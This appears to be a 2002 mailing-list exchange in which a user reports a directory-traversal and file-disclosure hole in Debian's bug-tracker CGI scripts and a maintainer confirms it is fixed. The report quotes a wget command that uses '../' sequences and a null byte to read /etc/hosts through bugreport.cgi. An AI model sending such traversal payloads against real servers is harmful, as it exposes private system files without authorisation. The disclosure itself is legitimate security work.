On Wed, Nov 06, 2002 at 09:51:18AM -0800, Max wrote: > Guys, your cgi scripts allow directory traversing and file disclosure. > See for yourself: > > wget -O - > "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=../../../../../../etc/hosts%00";
Thanks for the notice; this is now fixed. Regards, -- Colin Watson [EMAIL PROTECTED]
